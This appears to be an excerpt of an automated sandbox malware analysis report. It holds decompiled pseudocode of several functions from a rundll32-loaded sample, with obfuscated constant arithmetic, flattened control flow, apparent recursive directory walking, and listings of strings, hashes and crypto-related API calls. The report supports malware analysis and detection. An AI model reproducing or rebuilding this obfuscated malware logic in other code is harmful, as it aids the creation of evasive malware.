				_v1112 = _v1112 ^ 0x00015b8c;
				_v1064 = 0xba20;
				_v1064 = _v1064 ^ 0x3b22f3f3;
				_v1064 = _v1064 ^ 0x3b2222af;
				_v1116 = 0xa287;
				_v1116 = _v1116 + 0x9065;
				_t253 = 0x5f;
				_v1116 = _v1116 / _t253;
				_v1116 = _v1116 + 0xffff8b94;
				_v1116 = _v1116 ^ 0xffffc056;
				_t238 = E002585BA(_t253);
				do {
					while(_t286 != 0x2b67e243) {
						if(_t286 == 0x35036a43) {
							_push( &_v1040);
							_push( &_v520);
							return E00247B63(_v1064, _v1116, __eflags);
						}
						if(_t286 == 0x35c963e4) {
							_t286 = 0x39b3b44d;
							continue;
						}
						_t295 = _t286 - 0x39b3b44d;
						if(_t286 != 0x39b3b44d) {
							goto L8;
						}
						_push(_v1092);
						_t245 = E0025889D(0x25c9b0, _v1052, _t295);
						_pop(_t264);
						_t282 =  *0x25ca2c; // 0x2c8300
						_t196 = _t282 + 0x230; // 0x77004d
						E0024C680(_t196, _v1096, _v1136, _t264, _v1104,  *0x25ca2c, _t245,  &_v520);
						_t238 = E00252025(_v1144, _t245, _v1108, _v1120);
						_t290 =  &(_t290[9]);
						_t286 = 0x2b67e243;
					}
					_push(_v1076);
					_t239 = E0025889D(0x25c980, _v1088, __eflags);
					_t240 = E00258C8F(_v1056);
					_t258 =  *0x25ca2c; // 0x2c8300
					_t210 = _t258 + 0x230; // 0x2c8530
					E002429E3(_t210, 0x104, _t239, _v1124, _v1132, _v1140, _t240,  &_v1040, _v1100, _v1084);
					_t238 = E00252025(_v1072, _t239, _v1080, _v1112);
					_t290 =  &(_t290[0xc]);
					_t286 = 0x35036a43;
					L8:
					__eflags = _t286 - 0x38d0088b;
				} while (__eflags != 0);
				return _t238;
			}

0x00258f49
0x00258f4f
0x00258f56
0x00258f5e
0x00258f66
0x00258f78
0x00258f7d
0x00258f83
0x00258f88
0x00258f8d
0x00258f95
0x00258f9d
0x00258fa5
0x00258fad
0x00258fb5
0x00258fc2
0x00258fca
0x00258fd2
0x00258fda
0x00258fe2
0x00258fea
0x00258fef
0x00258ff7
0x00258fff
0x0025900c
0x0025900d
0x00259011
0x00259019
0x0025901e
0x00259026
0x0025902e
0x00259038
0x0025903c
0x00259044
0x0025904c
0x0025905a
0x0025905e
0x00259066
0x0025906e
0x00259076
0x00259083
0x00259087
0x0025908f
0x00259097
0x0025909f
0x002590a9
0x002590ad
0x002590b5
0x002590bd
0x002590c5
0x002590cd
0x002590d5
0x002590dd
0x002590e5
0x002590ed
0x002590f5
0x002590fd
0x00259105
0x0025910a
0x00259112
0x0025911f
0x00259123
0x0025912b
0x00259133
0x0025913d
0x00259145
0x0025914a
0x00259155
0x0025915a
0x00259160
0x00259168
0x00259175
0x00259178
0x00259181
0x00259185
0x0025918a
0x00259192
0x0025919a
0x0025919f
0x002591a7
0x002591af
0x002591b7
0x002591bf
0x002591c7
0x002591d7
0x002591df
0x002591ef
0x002591f3
0x002591fb
0x00259203
0x0025920b
0x00259213
0x0025921b
0x00259223
0x0025922b
0x00259233
0x0025923b
0x00259247
0x0025924a
0x0025924e
0x00259256
0x00259262
0x00259276
0x00259276
0x00259280
0x0025938d
0x00259395
0x00000000
0x0025939c
0x0025928c
0x002592fc
0x00000000
0x002592fc
0x0025928e
0x00259290
0x00000000
0x00000000
0x00259296
0x002592a3
0x002592a8
0x002592c7
0x002592d4
0x002592da
0x002592ed
0x002592f2
0x002592f5
0x002592f5
0x00259303
0x00259310
0x0025931f
0x00259341
0x0025934d
0x00259353
0x00259369
0x0025936e
0x00259371
0x00259373
0x00259373
0x00259373
0x00000000

Strings

;, xrefs: 002591D7
Cg+, xrefs: 00259267
E/, xrefs: 00258FCA
_r*, xrefs: 00259170, 0025917C
m, xrefs: 00258FE2
y, xrefs: 00259192
e, xrefs: 002590CD
kI, xrefs: 0025903C
_r*, xrefs: 0025918A
aS, xrefs: 00259203

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: e$m$Cg+$E/$_r*$_r*$aS$kI$;$y
API String ID: 0-1402005448
Opcode ID: e56677c7ce760b6b449f53b350dd2469257a1c182db56606c1d63b82d7ca8517
Instruction ID: fbe60ab8b872db4a4da81797848449015d983caa903312deb683cac31cfba10e
Opcode Fuzzy Hash: e56677c7ce760b6b449f53b350dd2469257a1c182db56606c1d63b82d7ca8517
Instruction Fuzzy Hash: 18B13171509381DFD358CF24C58A41BFBE1FBC4798F208A1DF595862A0D7B98A48CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00251773, Relevance: 12.6, Strings: 10, Instructions: 147
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00251773(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* __ecx;
				void* _t131;
				void* _t148;
				void* _t151;
				signed int _t162;
				void* _t164;
				signed int* _t167;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0024602B(_t131);
				_v32 = 0x943f;
				_t167 =  &(( &_v64)[6]);
				_t164 = 0;
				_t151 = 0x349de80e;
				_t162 = 0x48;
				_v32 = _v32 * 0x69;
				_v32 = _v32 ^ 0x003ccdd6;
				_v56 = 0x5d22;
				_v56 = _v56 << 0xb;
				_v56 = _v56 * 0x6c;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 ^ 0x0003a52d;
				_v48 = 0xb9ad;
				_v48 = _v48 / _t162;
				_v48 = _v48 | 0x8e45101b;
				_v48 = _v48 ^ 0xce45129f;
				_v16 = 0x4535;
				_v16 = _v16 + 0xffff440f;
				_v16 = _v16 ^ 0xbfff8944;
				_v24 = 0xd710;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0x000d4c75;
				_v44 = 0x65fd;
				_v44 = _v44 >> 2;
				_v44 = _v44 | 0x32207922;
				_v44 = _v44 ^ 0x322078de;
				_v28 = 0xded8;
				_v28 = _v28 ^ 0x86a01735;
				_v28 = _v28 ^ 0x86a0c6d1;
				_v64 = 0xdb93;
				_v64 = _v64 + 0x597e;
				_v64 = _v64 << 0xa;
				_v64 = _v64 << 0xa;
				_v64 = _v64 ^ 0x5110354e;
				_v60 = 0x2ada;
				_v60 = _v60 | 0x1c3e2a8f;
				_v60 = _v60 + 0xf49a;
				_v60 = _v60 ^ 0xe6209c52;
				_v60 = _v60 ^ 0xfa1f8dfc;
				_v20 = 0xdaa6;
				_v20 = _v20 + 0xb461;
				_v20 = _v20 ^ 0x0001dcca;
				_v40 = 0x4872;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 ^ 0xb451885a;
				_v40 = _v40 ^ 0xb451b970;
				_v36 = 0x262e;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 + 0x6428;
				_v36 = _v36 ^ 0x00003c11;
				_v8 = 0x6e80;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x06e82b80;
				_v12 = 0x3e9d;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x00005153;
				_v52 = 0x8462;
				_v52 = _v52 ^ 0xcdf70fa2;
				_v52 = _v52 ^ 0xe5a9b23c;
				_v52 = _v52 | 0x26296c1d;
				_v52 = _v52 ^ 0x2e7f2e4a;
				do {
					while(_t151 != 0x6cb1230) {
						if(_t151 == 0x944062a) {
							_push(_t151);
							_push(_t151);
							_t164 = E00248736(_v4 + _v4);
							if(_t164 != 0) {
								_t151 = 0x6cb1230;
								continue;
							}
						} else {
							if(_t151 == 0x30a4ce3e) {
								_t148 = E002577A3(_a4,  &_v4, _v24, _v44, _a8, _v28, 0, _v64, _v48 | _v32);
								_t167 =  &(_t167[7]);
								if(_t148 != 0) {
									_t151 = 0x944062a;
									continue;
								}
							} else {
								if(_t151 != 0x349de80e) {
									goto L11;
								} else {
									_t151 = 0x30a4ce3e;
									continue;
								}
							}
						}
						goto L12;
					}
					E002577A3(_a4,  &_v4, _v36, _v8, _a8, _v12, _t164, _v52, _v16 | _v56);
					_t167 =  &(_t167[7]);
					_t151 = 0x222ae378;
					L11:
				} while (_t151 != 0x222ae378);
				L12:
				return _t164;
			}

0x0025177a
0x0025177e
0x00251782
0x00251786
0x0025178a
0x0025178c
0x00251791
0x00251799
0x002517a3
0x002517a5
0x002517b6
0x002517b7
0x002517bb
0x002517c3
0x002517cb
0x002517d5
0x002517d9
0x002517de
0x002517e6
0x002517f9
0x002517fd
0x00251805
0x0025180d
0x00251815
0x0025181d
0x00251825
0x0025182d
0x00251832
0x0025183a
0x00251842
0x00251847
0x0025184f
0x00251857
0x0025185f
0x00251867
0x0025186f
0x00251877
0x0025187f
0x00251884
0x00251889
0x00251891
0x00251899
0x002518a1
0x002518a9
0x002518b1
0x002518b9
0x002518c1
0x002518c9
0x002518d1
0x002518d9
0x002518de
0x002518e6
0x002518ee
0x002518f6
0x002518fb
0x00251903
0x0025190b
0x00251913
0x00251918
0x00251920
0x00251928
0x0025192d
0x00251935
0x0025193d
0x00251945
0x0025194d
0x00251955
0x0025195d
0x0025195d
0x00251963
0x002519c0
0x002519c1
0x002519ca
0x002519d0
0x002519d2
0x00000000
0x002519d2
0x00251965
0x00251967
0x002519a0
0x002519a5
0x002519aa
0x002519ac
0x00000000
0x002519ac
0x00251969
0x0025196f
0x00000000
0x00251975
0x00251975
0x00000000
0x00251975
0x0025196f
0x00251967
0x00000000
0x00251963
0x002519fc
0x00251a01
0x00251a04
0x00251a09
0x00251a09
0x00251a16
0x00251a1e

Strings

uL, xrefs: 00251832
"], xrefs: 002517C3
x*", xrefs: 00251A04
rH, xrefs: 002518D1
x*", xrefs: 00251A09
5E, xrefs: 0025180D
SQ, xrefs: 0025192D
~Y, xrefs: 00251877
"y 2, xrefs: 00251847
(d, xrefs: 002518FB

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "]$"y 2$(d$5E$SQ$rH$uL$x*"$x*"$~Y
API String ID: 0-656425227
Opcode ID: e7280d44e7a884410bcaec10a4673638d73f0fd9bd229187a27b5946fca426a3
Instruction ID: 8762335f6c9d6867a15649d987350d76174e135f97f587de3ad33c60e69b6cfe
Opcode Fuzzy Hash: e7280d44e7a884410bcaec10a4673638d73f0fd9bd229187a27b5946fca426a3
Instruction Fuzzy Hash: 186120711093829FD359CF60C89992BBBE1BBD5788F104A1DF69696260C3B5CA18CF87

Uniqueness

Uniqueness Score: -1.00%

Function 10002730, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63encryptionmemoryCOMMON

Download Yara Rule

APIs

StgSerializePropVariant.PROPSYS(?,?,?,?,?,?,10002FCC,?,?), ref: 10002741
CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 10002761
CoTaskMemAlloc.OLE32(?), ref: 10002782
CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 100027AA
CoTaskMemFree.OLE32(00000000), ref: 100027CC
CoTaskMemFree.OLE32(?), ref: 100027D6

Strings

o, xrefs: 10002741

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Task$BinaryCryptFreeString$AllocPropSerializeVariant
String ID: o
API String ID: 207024522-3306556724
Opcode ID: 00f394acfb645895ae8b55d7716a322e047d0b4f2a77fad1ab660e857ddb64e1
Instruction ID: 41362f2d7e868ca1a04e6972f66fe0b1fe61006e645ec082c551d45625b46eb2
Opcode Fuzzy Hash: 00f394acfb645895ae8b55d7716a322e047d0b4f2a77fad1ab660e857ddb64e1
Instruction Fuzzy Hash: 1E114F7BD00129BBEB119BA4CC44EDE7BB9EF447A1F124162FD45E7224DB318E409AE0

Uniqueness

Uniqueness Score: -1.00%

Function 00252B16, Relevance: 11.6, Strings: 9, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00252B16(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
				char _v520;
				char _v1040;
				short _v1584;
				short _v1586;
				char _v1588;
				signed int _v1632;
				signed int _v1636;
				unsigned int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				unsigned int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				void* __edx;
				void* _t314;
				signed int _t340;
				signed int _t342;
				signed int _t346;
				void* _t348;
				void* _t354;
				signed int _t358;
				void* _t360;
				void* _t389;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				void* _t408;
				void* _t409;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0024602B(_t314);
				_v1672 = 0x92f4;
				_t409 = _t408 + 0x1c;
				_t354 = 0x3181563a;
				_t400 = 0x5d;
				_v1672 = _v1672 / _t400;
				_v1672 = _v1672 ^ 0xa72c55b3;
				_v1672 = _v1672 ^ 0xa72c5437;
				_v1736 = 0x461f;
				_v1736 = _v1736 + 0xd353;
				_v1736 = _v1736 + 0xffff7400;
				_v1736 = _v1736 + 0xffff12e8;
				_v1736 = _v1736 ^ 0xffffeb08;
				_v1684 = 0x12ca;
				_v1684 = _v1684 + 0xffffbd30;
				_v1684 = _v1684 + 0xc084;
				_v1684 = _v1684 ^ 0x00009b25;
				_v1700 = 0x68fe;
				_v1700 = _v1700 >> 0x10;
				_v1700 = _v1700 >> 0xf;
				_v1700 = _v1700 ^ 0x000058ac;
				_v1676 = 0xc4c1;
				_v1676 = _v1676 + 0x377e;
				_v1676 = _v1676 + 0xffff6b29;
				_v1676 = _v1676 ^ 0x0000377c;
				_v1708 = 0x7055;
				_v1708 = _v1708 << 0xe;
				_v1708 = _v1708 ^ 0x1eb23ae3;
				_v1708 = _v1708 ^ 0x02a72f08;
				_v1648 = 0x750a;
				_v1648 = _v1648 | 0xec573941;
				_v1648 = _v1648 ^ 0xec5707ed;
				_v1744 = 0xfcbf;
				_t401 = 0x2c;
				_v1744 = _v1744 * 0x3d;
				_v1744 = _v1744 >> 0xd;
				_v1744 = _v1744 / _t401;
				_v1744 = _v1744 ^ 0x00003058;
				_v1636 = 0x9933;
				_v1636 = _v1636 << 3;
				_v1636 = _v1636 ^ 0x0004b1ef;
				_v1668 = 0xb76d;
				_v1668 = _v1668 | 0xef4f757f;
				_v1668 = _v1668 ^ 0xef4ff671;
				_v1656 = 0xf145;
				_v1656 = _v1656 + 0x1194;
				_v1656 = _v1656 ^ 0x00010bb0;
				_v1752 = 0xf3e9;
				_t402 = 0x49;
				_v1752 = _v1752 / _t402;
				_v1752 = _v1752 + 0x9c03;
				_v1752 = _v1752 + 0xffffb211;
				_v1752 = _v1752 ^ 0x000027fb;
				_v1728 = 0x648a;
				_v1728 = _v1728 ^ 0x1010be16;
				_v1728 = _v1728 * 0x14;
				_v1728 = _v1728 | 0x258edfa9;
				_v1728 = _v1728 ^ 0x65dfe7b9;
				_v1688 = 0x4eab;
				_v1688 = _v1688 << 0xa;
				_v1688 = _v1688 | 0x3ca08384;
				_v1688 = _v1688 ^ 0x3dba9eb2;
				_v1756 = 0xd2f4;
				_t403 = 0x23;
				_v1756 = _v1756 / _t403;
				_v1756 = _v1756 ^ 0xcde225b2;
				_t404 = 0x6e;
				_v1756 = _v1756 / _t404;
				_v1756 = _v1756 ^ 0x01df76bd;
				_v1760 = 0x6cd1;
				_v1760 = _v1760 * 0x7d;
				_v1760 = _v1760 ^ 0x8e200a23;
				_v1760 = _v1760 >> 3;
				_v1760 = _v1760 ^ 0x11c2d811;
				_v1640 = 0xac3a;
				_v1640 = _v1640 >> 3;
				_v1640 = _v1640 ^ 0x00004856;
				_v1748 = 0x4fc2;
				_v1748 = _v1748 >> 0xf;
				_v1748 = _v1748 * 0x31;
				_v1748 = _v1748 ^ 0x38a83a44;
				_v1748 = _v1748 ^ 0x38a82be9;
				_v1680 = 0xb86a;
				_v1680 = _v1680 | 0x02231922;
				_v1680 = _v1680 + 0xaf06;
				_v1680 = _v1680 ^ 0x022411a2;
				_v1644 = 0x3f39;
				_v1644 = _v1644 + 0xffff5bb9;
				_v1644 = _v1644 ^ 0xffffc632;
				_v1692 = 0xc5f9;
				_v1692 = _v1692 ^ 0xaafe79bc;
				_v1692 = _v1692 >> 0xf;
				_v1692 = _v1692 ^ 0x00013e0d;
				_v1740 = 0x58ed;
				_v1740 = _v1740 + 0xffff3fce;
				_v1740 = _v1740 * 0x34;
				_v1740 = _v1740 * 0x49;
				_v1740 = _v1740 ^ 0xfa04971a;
				_v1696 = 0xcc7a;
				_v1696 = _v1696 >> 4;
				_v1696 = _v1696 << 1;
				_v1696 = _v1696 ^ 0x00000d26;
				_v1732 = 0xc33a;
				_v1732 = _v1732 | 0xb66c57ae;
				_v1732 = _v1732 >> 5;
				_v1732 = _v1732 * 0x56;
				_v1732 = _v1732 ^ 0xea449beb;
				_v1712 = 0xdae0;
				_v1712 = _v1712 >> 0xc;
				_v1712 = _v1712 ^ 0xc13d67df;
				_v1712 = _v1712 ^ 0xc13d455b;
				_v1716 = 0x5478;
				_v1716 = _v1716 | 0xa382055d;
				_v1716 = _v1716 * 0x26;
				_v1716 = _v1716 ^ 0x4558c259;
				_v1720 = 0xeafc;
				_v1720 = _v1720 + 0xffff5250;
				_v1720 = _v1720 ^ 0x4a0f2ed9;
				_v1720 = _v1720 ^ 0x4a0f1f8c;
				_v1664 = 0x8e28;
				_v1664 = _v1664 ^ 0x7b061f8d;
				_v1664 = _v1664 + 0xffffa0ec;
				_v1664 = _v1664 ^ 0x7b062de0;
				_v1724 = 0xce31;
				_v1724 = _v1724 << 0xe;
				_v1724 = _v1724 << 7;
				_v1724 = _v1724 << 5;
				_v1724 = _v1724 ^ 0xc4004273;
				_v1704 = 0xa554;
				_v1704 = _v1704 << 5;
				_v1704 = _v1704 * 0x35;
				_v1704 = _v1704 ^ 0x04475614;
				_v1660 = 0xb9dc;
				_v1660 = _v1660 + 0x9e03;
				_v1660 = _v1660 ^ 0x00011a8b;
				_v1652 = 0xf227;
				_t399 = _v1660;
				_v1652 = _v1652 / _t404;
				_v1652 = _v1652 ^ 0x00007d1f;
				while(1) {
					L1:
					_t389 = 0x2e;
					L2:
					while(_t354 != 0x2ecc014) {
						if(_t354 == 0xf8b22d1) {
							__eflags = _v1632 & _v1672;
							if(__eflags == 0) {
								_t340 = _a8( &_v1632, _a20);
								asm("sbb ecx, ecx");
								_t358 =  ~_t340 & 0x1c386f3a;
								L13:
								_t354 = _t358 + 0x2ecc014;
								while(1) {
									L1:
									_t389 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v1588 - _t389;
							if(_v1588 != _t389) {
								L20:
								__eflags = _a16;
								if(__eflags != 0) {
									_push(_v1760);
									_t348 = E0025889D(0x25c0b0, _v1756, __eflags);
									_pop(_t360);
									E0024C680( &_v1588, _v1748, _v1680, _t360, _v1644, _a4, _t348,  &_v520);
									E00252B16(_v1692,  &_v520, _a8, _v1696, _a16, _a20);
									_t409 = _t409 + 0x30;
									_t346 = E00252025(_v1732, _t348, _v1712, _v1716);
									_t389 = 0x2e;
								}
								L19:
								_t354 = 0x1f252f4e;
								continue;
							}
							__eflags = _v1586;
							if(__eflags == 0) {
								goto L19;
							}
							__eflags = _v1586 - _t389;
							if(_v1586 != _t389) {
								goto L20;
							}
							__eflags = _v1584;
							if(__eflags != 0) {
								goto L20;
							}
							goto L19;
						}
						if(_t354 == 0x1f252f4e) {
							_t342 = E0024595A(_v1720, _t399,  &_v1632, _v1664);
							asm("sbb ecx, ecx");
							_t358 =  ~_t342 & 0x0c9e62bd;
							__eflags = _t358;
							goto L13;
						}
						if(_t354 == 0x21983c19) {
							_push(_v1684);
							E00257BAF(__eflags,  &_v1040, _v1676, _a4, _v1708, _v1648, E0025889D(0x25c090, _v1736, __eflags));
							_t346 = E00252025(_v1744, _t343, _v1636, _v1668);
							_t409 = _t409 + 0x20;
							_t354 = 0x3298743a;
							while(1) {
								L1:
								_t389 = 0x2e;
								goto L2;
							}
						}
						if(_t354 == 0x3181563a) {
							_t354 = 0x21983c19;
							continue;
						}
						if(_t354 != 0x3298743a) {
							L24:
							__eflags = _t354 - 0x2a8aa181;
							if(__eflags != 0) {
								continue;
							}
							L25:
							return _t346;
						}
						_t346 = E0024109C(_v1656,  &_v1040,  &_v1632, _v1752, _v1728, _v1688);
						_t399 = _t346;
						_t409 = _t409 + 0x10;
						if(_t346 == 0xffffffff) {
							goto L25;
						}
						_t354 = 0xf8b22d1;
						goto L1;
					}
					E00241B5C(_v1724, _v1704, _v1660, _t399, _v1652);
					_t409 = _t409 + 0xc;
					_t354 = 0x2a8aa181;
					_t389 = 0x2e;
					goto L24;
				}
			}

0x00252b1f
0x00252b26
0x00252b2d
0x00252b34
0x00252b3b
0x00252b43
0x00252b44
0x00252b49
0x00252b54
0x00252b5d
0x00252b64
0x00252b69
0x00252b6f
0x00252b77
0x00252b7f
0x00252b87
0x00252b8f
0x00252b97
0x00252b9f
0x00252ba7
0x00252baf
0x00252bb7
0x00252bbf
0x00252bc7
0x00252bcf
0x00252bd4
0x00252bd9
0x00252be1
0x00252be9
0x00252bf1
0x00252bf9
0x00252c01
0x00252c09
0x00252c0e
0x00252c16
0x00252c1e
0x00252c29
0x00252c34
0x00252c3f
0x00252c4c
0x00252c4f
0x00252c53
0x00252c60
0x00252c64
0x00252c6c
0x00252c77
0x00252c7f
0x00252c8a
0x00252c92
0x00252c9a
0x00252ca2
0x00252caa
0x00252cb2
0x00252cba
0x00252cc6
0x00252cc9
0x00252ccd
0x00252cd5
0x00252cdd
0x00252ce5
0x00252ced
0x00252cfa
0x00252cfe
0x00252d06
0x00252d10
0x00252d18
0x00252d1d
0x00252d25
0x00252d2d
0x00252d3b
0x00252d40
0x00252d46
0x00252d52
0x00252d55
0x00252d59
0x00252d61
0x00252d6e
0x00252d72
0x00252d7a
0x00252d7f
0x00252d87
0x00252d92
0x00252d9a
0x00252da5
0x00252dad
0x00252db7
0x00252dbb
0x00252dc3
0x00252dcb
0x00252dd3
0x00252ddb
0x00252de3
0x00252deb
0x00252df6
0x00252e01
0x00252e0c
0x00252e14
0x00252e1c
0x00252e21
0x00252e29
0x00252e31
0x00252e3e
0x00252e47
0x00252e4b
0x00252e53
0x00252e5b
0x00252e60
0x00252e64
0x00252e6c
0x00252e74
0x00252e7c
0x00252e86
0x00252e8a
0x00252e92
0x00252e9a
0x00252e9f
0x00252ea7
0x00252eaf
0x00252eb7
0x00252ec4
0x00252ec8
0x00252ed0
0x00252ed8
0x00252ee0
0x00252ee8
0x00252ef0
0x00252ef8
0x00252f00
0x00252f08
0x00252f10
0x00252f18
0x00252f1f
0x00252f29
0x00252f2e
0x00252f36
0x00252f3e
0x00252f48
0x00252f4c
0x00252f54
0x00252f5c
0x00252f64
0x00252f6c
0x00252f7a
0x00252f7e
0x00252f82
0x00252f8a
0x00252f8a
0x00252f8c
0x00000000
0x00252f8d
0x00252f9f
0x002530a3
0x002530aa
0x00253193
0x0025319e
0x002531a0
0x00253094
0x00253094
0x00252f8a
0x00252f8a
0x00252f8c
0x00000000
0x00252f8c
0x00252f8a
0x002530b0
0x002530b8
0x002530e1
0x002530e1
0x002530e9
0x002530eb
0x002530f8
0x002530fd
0x0025312e
0x0025315f
0x00253164
0x00253175
0x0025317e
0x0025317e
0x002530da
0x002530da
0x00000000
0x002530da
0x002530ba
0x002530c3
0x00000000
0x00000000
0x002530c5
0x002530cd
0x00000000
0x00000000
0x002530cf
0x002530d8
0x00000000
0x00000000
0x00000000
0x002530d8
0x00252fa7
0x00253081
0x0025308c
0x0025308e
0x0025308e
0x00000000
0x0025308e
0x00252fb3
0x0025300c
0x00253044
0x0025305d
0x00253062
0x00253065
0x00252f8a
0x00252f8a
0x00252f8c
0x00000000
0x00252f8c
0x00252f8a
0x00252fbb
0x00253005
0x00000000
0x00253005
0x00252fc3
0x002531cc
0x002531cc
0x002531d2
0x00000000
0x00000000
0x002531e1
0x002531e1
0x002531e1
0x00252feb
0x00252ff0
0x00252ff2
0x00252ff8
0x00000000
0x00000000
0x00252ffe
0x00000000
0x00252ffe
0x002531bc
0x002531c1
0x002531c4
0x002531cb
0x00000000
0x002531cb

Strings

Up, xrefs: 00252C01
9?, xrefs: 00252DEB
sB, xrefs: 00252F2E
xT, xrefs: 00252EAF
X, xrefs: 00252E29
&, xrefs: 00252E64
VH, xrefs: 00252D9A
A9W, xrefs: 00252C29
|7, xrefs: 00252BF9

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &$9?$A9W$Up$VH$sB$xT$|7$X
API String ID: 0-983689062
Opcode ID: 8ab34d7d775e53dbc6bf5424698efdac8eee1a345dd5410545fe0c0597c8e3e2
Instruction ID: 4be9af7be6dbcb69e7789ca8da81b77fed63e68c7e3483921ef993cdbc187719
Opcode Fuzzy Hash: 8ab34d7d775e53dbc6bf5424698efdac8eee1a345dd5410545fe0c0597c8e3e2
Instruction Fuzzy Hash: B5F142715183818FD368CF61C549A5FBBE1FBC4348F108A1DF69A862A0D7B88A59CF47

Uniqueness

Uniqueness Score: -1.00%

Function 002488E5, Relevance: 11.5, Strings: 9, Instructions: 298
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E002488E5(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _t325;
				short* _t331;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				short _t373;
				void* _t376;
				intOrPtr* _t380;
				void* _t382;

				 *(_t382 + 8) = 0xaa86;
				 *(_t382 + 8) =  *(_t382 + 8) + 0xffffe070;
				 *(_t382 + 8) =  *(_t382 + 8) << 0xc;
				 *(_t382 + 8) =  *(_t382 + 8) << 6;
				 *(_t382 + 8) =  *(_t382 + 8) ^ 0x2bd80002;
				 *(_t382 + 0x64) = 0xdd5d;
				 *(_t382 + 0x64) =  *(_t382 + 0x64) ^ 0x3d690a55;
				 *(_t382 + 0x64) =  *(_t382 + 0x64) ^ 0x3d69d718;
				 *(_t382 + 0x74) = 0x57af;
				_t380 = __edx;
				 *((intOrPtr*)(_t382 + 0x9c)) = __ecx;
				_t373 = 0;
				_t340 = 5;
				 *(_t382 + 0x88) =  *(_t382 + 0x74) / _t340;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) ^ 0x40001189;
				_t376 = 0x1f5a6ea2;
				 *(_t382 + 0x68) = 0xf929;
				 *(_t382 + 0x68) =  *(_t382 + 0x68) ^ 0xb70a9a6f;
				 *(_t382 + 0x68) =  *(_t382 + 0x68) ^ 0xb70a6fd1;
				 *(_t382 + 0x74) = 0x8254;
				 *(_t382 + 0x74) =  *(_t382 + 0x74) << 2;
				 *(_t382 + 0x74) =  *(_t382 + 0x74) ^ 0x00022a5c;
				 *(_t382 + 0x48) = 0x274c;
				_t341 = 0x4c;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) * 0x48;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x4b411b57;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x4b4a2351;
				 *(_t382 + 0x7c) = 0x6684;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) + 0xaed9;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) ^ 0x00014ccf;
				 *(_t382 + 0x40) = 0x1902;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0x72d0747c;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) / _t341;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0x01828d69;
